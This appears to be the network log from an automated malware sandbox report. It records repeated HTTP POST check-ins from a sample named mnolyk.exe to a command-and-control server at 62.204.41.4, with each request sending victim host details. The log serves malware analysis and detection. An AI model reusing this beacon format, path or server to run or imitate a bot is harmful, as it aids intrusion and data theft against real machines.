                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:59.914640903 CET | 464 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:59 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        264 | 192.168.2.5 | 49954 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:00.082619905 CET | 465 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:00.146924019 CET | 465 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:00 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        265 | 192.168.2.5 | 49955 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:00.317508936 CET | 466 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:00.382448912 CET | 466 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:00 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        266 | 192.168.2.5 | 49956 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:00.553096056 CET | 467 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:00.618180990 CET | 467 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:00 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        267 | 192.168.2.5 | 49957 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:00.788641930 CET | 468 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:00.854032993 CET | 468 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:00 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        268 | 192.168.2.5 | 49958 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:01.022167921 CET | 469 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:01.087373018 CET | 469 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:01 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        269 | 192.168.2.5 | 49959 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:01.254903078 CET | 470 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:01.318948984 CET | 470 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:01 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        27 | 192.168.2.5 | 49717 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:16:38.110724926 CET | 227 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:38.180257082 CET | 228 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:38 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        270 | 192.168.2.5 | 49960 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:01.488614082 CET | 471 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:01.551234961 CET | 471 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:01 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        271 | 192.168.2.5 | 49961 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:01.749516010 CET | 472 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:01.814297915 CET | 472 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:01 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        272 | 192.168.2.5 | 49962 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:02.000570059 CET | 473 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:02.069396973 CET | 473 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:02 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        273 | 192.168.2.5 | 49963 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:02.243571997 CET | 474 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:02.309935093 CET | 474 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:02 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        274 | 192.168.2.5 | 49964 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:02.489491940 CET | 475 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:02.553540945 CET | 475 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:02 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        275 | 192.168.2.5 | 49965 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:02.723607063 CET | 476 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:02.786803007 CET | 476 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:02 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        276 | 192.168.2.5 | 49966 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:02.959271908 CET | 477 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:03.022351027 CET | 477 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:02 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        277 | 192.168.2.5 | 49967 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:03.193008900 CET | 478 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:03.259531975 CET | 478 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:03 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        278 | 192.168.2.5 | 49968 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:03.426820993 CET | 479 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:03.490326881 CET | 479 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:03 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        279192.168.2.54996962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:03.665185928 CET480OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:03.728063107 CET480INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:03 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        28192.168.2.54971862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:16:38.360119104 CET228OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:38.424526930 CET229INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:38 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        280192.168.2.54997062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:03.894707918 CET481OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:03.957648993 CET481INHTTP/1.1 200 OK
